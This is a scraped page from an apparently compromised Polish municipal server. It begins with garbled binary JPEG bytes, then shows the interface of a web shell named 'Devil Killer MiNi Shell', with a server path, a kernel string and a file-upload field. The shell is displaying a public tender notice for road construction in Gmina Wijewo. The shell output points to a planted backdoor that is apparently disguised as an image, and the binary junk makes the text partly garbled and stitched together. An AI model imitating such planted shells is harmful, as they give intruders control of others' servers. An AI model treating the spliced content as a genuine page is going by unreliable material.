JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230223/0010843201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa drogi gminnej od skrzyżowania z drogą wojewódzką 305 w miejscowości Radomyśl wraz z przebudową drogi gminnej w miejscowości Przylesie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA WIJEWO</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">GMINA WIJEWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411050706</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">PARKOWA 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wijewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-150</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">655494085</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">655494755</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wijewo@wijewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wijewo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa drogi gminnej od skrzyżowania z drogą wojewódzką 305 w miejscowości Radomyśl wraz z przebudową drogi gminnej w miejscowości Przylesie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-77617151-b2b6-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00108432</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00063960/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa drogi gminnej od skrzyżowania z drogą wojewódzką w miejscowości 305 w miejscowości Radomyśl wraz przebudowa drogi gminnej w miejscowości Przylesie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/wijewo/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym<br/>a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje,<br/>przekazywane są za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/wijewo/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym. Szczegółowe wymagania techniczne i organizacyjne dot.<br/>korespondencji elektronicznej zostały ujęte w rozdziale XV i XVI SWZ nr RR.271.1.2.2023.<br/>Z uwagi na limit znaków w ogłoszeniu Zamawiający w niniejszym punkcie nie ma możliwości opisania<br/>wszystkich wymagań.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Urząd Gminy Wijewo ul. Parkowa 1, 64-150<br/>Wijewo.<br/>2) Administrator Danych wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować pod<br/>adresem e-mail: iod@wijewo.pl lub pisemnie na adres siedziby Administratora Danych.<br/>3) Pani/Pana dane osobowe przetwarzane będą w celu niezbędnym do wypełnienie obowiązku<br/>pranego ciążącego na Administratorze Danych na podstawie ustawy z dnia 11 września 2019r. Prawo<br/>zamówień publicznych w związku z art. 6 ust. 1 lit. c RODO<br/>4) Pani/Pana dane osobowe mogą być przekazywane innym odbiorcom na podstawie przepisów prawa<br/>lub zawartych umów i nie będą przekazywane do państwa trzeciego lub organizacji międzynarodowej.<br/>5) Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do realizacji celu, w którym<br/>zostały zebrane, a po tym czasie przez okres oraz w zakresie wymaganym przez przepisy prawa.<br/>6) Posiada Pani/Pan prawo dostępu do treści swoich danych, ich sprostowania, ograniczenia<br/>przetwarzania oraz wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych narusza przepisy<br/>RODO.<br/>7) Podanie przez Panią/Pana danych osobowych jest wymogiem ustawowym, niezbędnym do udziału<br/>w postępowaniu o udzielenie zamówienia publicznego.<br/>8) Pani/Pana dane osobowe nie będą przetwarzane w sposób zautomatyzowany i nie będą<br/>profilowane.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RR 271.1.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia realizowany jest pod nazwą.: „Budowa drogi gminnej od skrzyżowania <br/>z drogą wojewódzką 305 w miejscowości Radomyśl wraz z przebudową drogi gminnej <br/>w miejscowości Przylesie” , w tym przewiduje się również roboty budowlane związane<br/> z przebudową części drogi gminnej na ul. Wczasowej w miejscowości Brenno oraz przebudową części drogi gminnej i budową chodnika na odcinku Brenno-Ostrów w obrębie Brenno i został podzielony na dwie części:<br/><br/>Część I – Budowa drogi gminnej od skrzyżowania z drogą wojewódzką 305 w miejscowości <br/> Radomyśl wraz z przebudową drogi gminnej w miejscowości Przylesie.<br/><br/>Część I przedmiotu zamówienia obejmuje budowę drogi gminnej od skrzyżowania z drogą wojewódzką 305 w miejscowości Radomyśl wraz z przebudową drogi gminnej w miejscowości Przylesie.<br/> W ramach części I przedmiotu zamówienia założono budowę drogi gminnej o nawierzchni asfaltowej na długości 985,64 mb, szerokości jezdni 5,5m i szerokością poboczy 0,75 m. oraz przebudowę drogi gminnej w miejscowości Przylesie o nawierzchni asfaltowej na długości 330 mb, szerokości jezdni 5,5m i szerokością poboczy 0,75 m. <br/>W ramach zamówienia wykonane zostaną roboty rozbiórkowe, ziemne, profilowanie i korytowanie podłoża, wykonanie podbudowy jezdni oraz wykonanie nawierzchni z betonu asfaltowego, roboty wykończeniowe (humusowanie skarp). Zamówienie obejmuje również montaż urządzeń bezpieczeństwa ruchu (w tym m.in. oznakowanie poziome nawierzchni, znaki drogowe).<br/>1.	Szczegółowy zakres przedmiotu zamówienia dla Części I i II określa załącznik nr 9 do SWZ – dokumentacja projektowa (tj. przedmiar robót, specyfikacja techniczna wykonania <br/>i odbioru robót budowlanych, projekt techniczny, plan orientacyjny).<br/>2.	Opis przedmiotu zamówienia obejmuje również:<br/>a)	uporządkowanie terenu po wykonaniu przedmiotu zamówienia.<br/>b)	zabezpieczenie terenu objętego robotami przed dostępem osób postronnych,<br/>c)	ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia.<br/>3.	Zamawiający przewiduje możliwość ustanowienia nadzoru inwestorskiego również <br/>w przypadku gdy w świetle obowiązujących przepisów nie jest to obligatoryjne w sytuacji gdy Zamawiający uzna to za celowe dla danej inwestycji.<br/><br/>4.	Wspólny Słownik Zamówień CPV:<br/>45233140-2 – Roboty drogowe<br/><br/>5.	Wymagania związane z realizacją zamówienia w zakresie zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących wskazane przez zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22⸹1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U z 2022.1510.t.j). <br/>6.	Wykonawca jest zobowiązany zawrzeć w każdej umowie o podwykonawstwo stosowne zapisy zobowiązujące podwykonawców do zatrudnienia na umowę o pracę wszystkich osób, które wykonują prace w sposób określony w art. 22⸹1 Kodeksu Pracy.<br/>7.	Szczegółowe wymagania dotyczące realizacji oraz egzekwowania wymogu zatrudnienia na podstawie stosunku pracy zostały określone we wzorze umowy stanowiącym Załącznik nr 7 do SWZ- dla Części I przedmiotu zamówienia i Załącznik nr 8 do SWZ - dla Części II przedmiotu zamówienia.<br/>8. Zakres zamówienia oraz szczegółowe właściwości i wymagania w stosunku do przedmiotu zamówienia zawarte są w SWZ i załącznikach do SWZ, w tym w: dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót, obowiązującymi przepisami, w tym <br/>w szczególności z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2020 poz. 1333 ze zm.) oraz zasadami wiedzy technicznej. Wszystkie roboty ujęte i nieujęte niniejszym opracowaniem należy prowadzić zgodnie z przepisami Prawa budowlanego oraz przepisami BHP.<br/><br/>UWAGA: <br/>1.	Jeżeli Opis Przedmiotu Zamówienia wskazywałby w odniesieniu do materiałów lub urządzeń lub rozwiązań znaki towarowe, patenty lub pochodzenie, to zgodnie z ustawą Prawo zamówień publicznych Zamawiający dopuszcza zaoferowanie materiałów /urządzeń/ rozwiązań równoważnych (zgodnie z art. 99 ust. 5 ustawy PZP). Materiały lub urządzenia pochodzące od konkretnego producenta określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać materiały lub urządzenia proponowane przez Wykonawcę, aby zostały spełnione wymagania stawiane przez Zamawiającego i stanowi jedynie wzorzec, przykład jakościowy przedmiotu zamówienia, a to oznacza, że Zamawiający dopuszcza produkty o parametrach jakościowych i cechach użytkowych (lub równoważnych), tj. nie gorszych niż parametry wskazanego produktu, materiału, urządzenia, elementu i uzna każdy produkt o wskazanych lub lepszych parametrach.<br/>2.	Gdziekolwiek w dokumentach kontraktowych powołane są konkretne normy i przepisy, które spełniać mają materiały, sprzęt i inne towary oraz wykonane i zbadane roboty, które będą obowiązywać postanowienia najnowszego wydania lub poprawionego wydania powołanych norm i przepisów o ile w warunkach kontraktu nie postanowiono inaczej. W przypadku gdy powołane normy i przepisy są państwowe lub odnoszą się do konkretnego kraju lub regionu, mogą być również stosowane inne odpowiednie normy zapewniające równoważny lub wyższy poziom wykonania. Jeżeli w dokumentacji przetargowej i projektowej przywołane są znaki towarowe, nazwy producentów, patent, pochodzenie użytych materiałów lub wyposażenia dopuszcza się zastosowanie towarów równoważnych o parametrach nie gorszych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzie odpowiadać wymaganiom<br/>zawartym w ustawie Pzp, SWZ i uzyska najwyższą liczbę punktów wyliczoną w oparciu o kryteria oceny ofert określone w rozdziale<br/>XIX SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia realizowany jest pod nazwą.: „Budowa drogi gminnej od skrzyżowania <br/>z drogą wojewódzką 305 w miejscowości Radomyśl wraz z przebudową drogi gminnej <br/>w miejscowości Przylesie” , w tym przewiduje się również roboty budowlane związane<br/> z przebudową części drogi gminnej na ul. Wczasowej w miejscowości Brenno oraz przebudową części drogi gminnej i budową chodnika na odcinku Brenno-Ostrów w obrębie Brenno i został podzielony na dwie części.<br/>Część II – Przebudowa części drogi gminnej na ul. Wczasowej w miejscowości Brenno oraz <br/> przebudowa części drogi gminnej i budowa chodnika na odcinku Brenno-Ostrów w <br/> obrębie Brenno.<br/><br/>Część II przedmiotu zamówienia obejmuje przebudowę części drogi gminnej na ul Wczasowej w miejscowości Brenno o nawierzchni asfaltowej na długości 860 mb, szerokości jezdni 4,5m, szerokości chodnika 1,5 m i pobocza 0,5m oraz przebudowę części drogi gminnej i budowę chodnika na odcinku Brenno -Ostrów w obrębie Brenno (droga o nawierzchni asfaltowej na długości 235 mb, szerokości jezdni 5,5m, oraz chodnik o nawierzchni z betonowej kostki brukowej na długości 230 m, szerokości 2,5 m).<br/>W ramach zamówienia wykonane zostaną roboty rozbiórkowe, ziemne, wykonanie wzmocnień wzdłuż /skraju jezdni, wyrównanie/obcięcie skraju jezdni, wykonanie korytowania, profilowanie podbudowy pod rozebranym chodnikiem, wykonanie podbudowy z tłucznia łamanego wraz z profilowaniem, wykonanie frezowania istniejącej nawierzchni asfaltowej, skropienie nawierzchni drogowej emulsją asfaltową , wykonanie nawierzchni z masy bitumicznej, utwardzenie pobocza oraz urządzenie bezpieczeństwa ruchu poprzez oznakowanie poziome nawierzchni bitumicznych (rozgraniczenie jezdni od ciągu pieszego) oraz montaż słupków rozgraniczających jezdnię od chodnika. W ramach budowy chodnika zakłada się ułożenie nawierzchni z betonowej kostki brukowej o grubości 8cm na podsypce cem-piask oraz wzmocnić podłożę z kruszywa stabilizowanego cementem.<br/><br/>Ze względu na okres wakacyjny (w sezonie letnim) i fakt, iż droga na ul. Wczasowej <br/>w miejscowości Brenno stanowi jedyny ciąg komunikacyjny do letniska Brenno – Ostrów, Zamawiający wskazuje, iż prowadzenie prac z zakresu wykonania nowej nawierzchni asfaltowej powinno się odbywać poza okresem wakacyjnym (tj. z pominięciem miesiąca lipiec, sierpień).<br/><br/>1.	Szczegółowy zakres przedmiotu zamówienia dla Części I i II określa załącznik nr 9 do SWZ – dokumentacja projektowa (tj. przedmiar robót, specyfikacja techniczna wykonania <br/>i odbioru robót budowlanych, projekt techniczny, plan orientacyjny).<br/>2.	Opis przedmiotu zamówienia obejmuje również:<br/>a)	uporządkowanie terenu po wykonaniu przedmiotu zamówienia.<br/>b)	zabezpieczenie terenu objętego robotami przed dostępem osób postronnych,<br/>c)	ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia.<br/>3.	Zamawiający przewiduje możliwość ustanowienia nadzoru inwestorskiego również <br/>w przypadku gdy w świetle obowiązujących przepisów nie jest to obligatoryjne w sytuacji gdy Zamawiający uzna to za celowe dla danej inwestycji.<br/><br/>4.	Wspólny Słownik Zamówień CPV:<br/>45233140-2 – Roboty drogowe<br/><br/>5.	Wymagania związane z realizacją zamówienia w zakresie zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących wskazane przez zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22⸹1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U z 2022.1510.t.j). <br/>6.	Wykonawca jest zobowiązany zawrzeć w każdej umowie o podwykonawstwo stosowne zapisy zobowiązujące podwykonawców do zatrudnienia na umowę o pracę wszystkich osób, które wykonują prace w sposób określony w art. 22⸹1 Kodeksu Pracy.<br/>7.	Szczegółowe wymagania dotyczące realizacji oraz egzekwowania wymogu zatrudnienia na podstawie stosunku pracy zostały określone we wzorze umowy stanowiącym Załącznik nr 7 do SWZ- dla Części I przedmiotu zamówienia i Załącznik nr 8 do SWZ - dla Części II przedmiotu zamówienia.<br/>8. Zakres zamówienia oraz szczegółowe właściwości i wymagania w stosunku do przedmiotu zamówienia zawarte są w SWZ i załącznikach do SWZ, w tym w: dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót, obowiązującymi przepisami, w tym <br/>w szczególności z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2020 poz. 1333 ze zm.) oraz zasadami wiedzy technicznej. Wszystkie roboty ujęte i nieujęte niniejszym opracowaniem należy prowadzić zgodnie z przepisami Prawa budowlanego oraz przepisami BHP.<br/><br/>UWAGA: <br/>1.	Jeżeli Opis Przedmiotu Zamówienia wskazywałby w odniesieniu do materiałów lub urządzeń lub rozwiązań znaki towarowe, patenty lub pochodzenie, to zgodnie z ustawą Prawo zamówień publicznych Zamawiający dopuszcza zaoferowanie materiałów /urządzeń/ rozwiązań równoważnych (zgodnie z art. 99 ust. 5 ustawy PZP). Materiały lub urządzenia pochodzące od konkretnego producenta określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać materiały lub urządzenia proponowane przez Wykonawcę, aby zostały spełnione wymagania stawiane przez Zamawiającego i stanowi jedynie wzorzec, przykład jakościowy przedmiotu zamówienia, a to oznacza, że Zamawiający dopuszcza produkty o parametrach jakościowych i cechach użytkowych (lub równoważnych), tj. nie gorszych niż parametry wskazanego produktu, materiału, urządzenia, elementu i uzna każdy produkt o wskazanych lub lepszych parametrach.<br/>2.	Gdziekolwiek w dokumentach kontraktowych powołane są konkretne normy i przepisy, które spełniać mają materiały, sprzęt i inne towary oraz wykonane i zbadane roboty, które będą obowiązywać postanowienia najnowszego wydania lub poprawionego wydania powołanych norm i przepisów o ile w warunkach kontraktu nie postanowiono inaczej. W przypadku gdy powołane normy i przepisy są państwowe lub odnoszą się do konkretnego kraju lub regionu, mogą być również stosowane inne odpowiednie normy zapewniające równoważny lub wyższy poziom wykonania. Jeżeli w dokumentacji przetargowej i projektowej przywołane są znaki towarowe, nazwy producentów, patent, pochodzenie użytych materiałów lub wyposażenia dopuszcza się zastosowanie towarów równoważnych o parametrach nie gorszych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie 